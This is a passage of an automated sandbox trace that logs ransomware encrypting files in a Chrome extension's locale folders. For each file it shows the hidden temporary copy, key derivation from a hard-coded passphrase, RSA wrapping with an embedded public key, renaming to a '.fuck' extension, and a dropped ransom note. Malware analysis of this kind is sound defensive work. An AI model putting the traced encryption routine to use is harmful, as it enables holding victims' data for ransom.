hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939b80*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939b80*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.123] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2939b80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939b80*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.124] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x149, lpOverlapped=0x0) returned 1 [0250.125] CryptEncrypt (in: hKey=0x2937f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x149, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0250.125] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0250.125] CloseHandle (hObject=0x5d58) returned 1 [0250.125] CloseHandle (hObject=0x5d5c) returned 1 [0250.125] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0250.129] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0250.129] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg")) returned 1 [0250.130] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.fuck")) returned 1 [0250.131] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.131] CryptDestroyKey (hKey=0x2937f38) returned 1 [0250.131] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.131] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.131] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.131] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0250.131] AreFileApisANSI () returned 1 [0250.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.131] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.132] GetFileType (hFile=0x5d54) returned 0x1 [0250.132] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.133] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.133] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x28e88b8 [0250.133] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.133] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.134] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.134] GetLastError () returned 0x0 [0250.134] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json")) returned 0x20 [0250.134] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0250.134] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.135] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.136] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.137] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.139] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.139] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.139] CryptHashData (hHash=0x28e7978, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.139] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x28e7978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x28e8078) returned 1 [0250.140] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.140] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.140] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29398d8) returned 1 [0250.140] CryptImportPublicKeyInfo (in: hCryptProv=0x29398d8, dwCertEncodingType=0x1, pInfo=0x2934810*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934840*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934848*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29387f8) returned 1 [0250.140] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.140] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939630*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939630*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.141] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939630*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939630*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.142] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf9, lpOverlapped=0x0) returned 1 [0250.143] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.143] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.144] CloseHandle (hObject=0x5d5c) returned 1 [0250.144] CloseHandle (hObject=0x5d58) returned 1 [0250.144] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0250.147] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0250.148] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0250.149] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0250.151] CryptDestroyHash (hHash=0x28e7978) returned 1 [0250.151] CryptDestroyKey (hKey=0x28e8078) returned 1 [0250.151] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.151] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.151] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0250.151] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0250.151] AreFileApisANSI () returned 1 [0250.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0250.151] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.152] GetFileType (hFile=0x5d54) returned 0x1 [0250.152] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.153] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.153] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0250.155] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.155] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.155] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.155] GetLastError () returned 0x0 [0250.155] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json")) returned 0x20 [0250.156] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x80) returned 1 [0250.157] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.157] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.158] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.158] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.161] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.161] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.161] CryptHashData (hHash=0x2937d78, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.161] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2937d78, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x28e88b8) returned 1 [0250.161] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.161] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.161] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939af8) returned 1 [0250.162] CryptImportPublicKeyInfo (in: hCryptProv=0x2939af8, dwCertEncodingType=0x1, pInfo=0x2934b50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934b80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934b88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x28e7978) returned 1 [0250.162] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.162] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29396b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29396b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.162] WriteFile (in: hFile=0x5d5c, lpBuffer=0x29396b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29396b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.164] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf9, lpOverlapped=0x0) returned 1 [0250.166] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.166] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.166] CloseHandle (hObject=0x5d58) returned 1 [0250.166] CloseHandle (hObject=0x5d5c) returned 1 [0250.166] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), bFailIfExists=0) returned 1 [0250.172] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x0) returned 1 [0250.172] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.gsg")) returned 1 [0250.173] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.fuck")) returned 1 [0250.175] CryptDestroyHash (hHash=0x2937d78) returned 1 [0250.175] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0250.175] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.175] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.175] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0250.175] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 